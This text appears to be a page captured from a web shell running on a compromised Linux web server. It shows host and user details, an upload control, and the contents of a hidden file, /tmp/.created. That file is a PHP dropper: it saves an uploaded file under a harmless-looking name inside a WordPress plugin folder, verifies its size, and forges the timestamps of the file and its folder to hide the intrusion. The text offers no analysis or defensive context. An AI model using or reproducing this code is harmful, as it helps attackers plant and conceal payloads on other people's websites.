HEX
Server: LiteSpeed
System: Linux s2.whitelabelclouds.com 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
User: aoadtech (1082)
PHP: 8.4.14
Disabled: NONE
Upload Files
File: //tmp/.created
<?php   $p = "/home/aoadtech/public_html//home/aoadtech/public_html/wp-content/plugins/wordpress-importer/php-toolkit/ByteStream/manufacturers"; $ft = 1763160508; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 1287892) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 1287892";         }         @unlink($p);     } } die('_upload_failed_');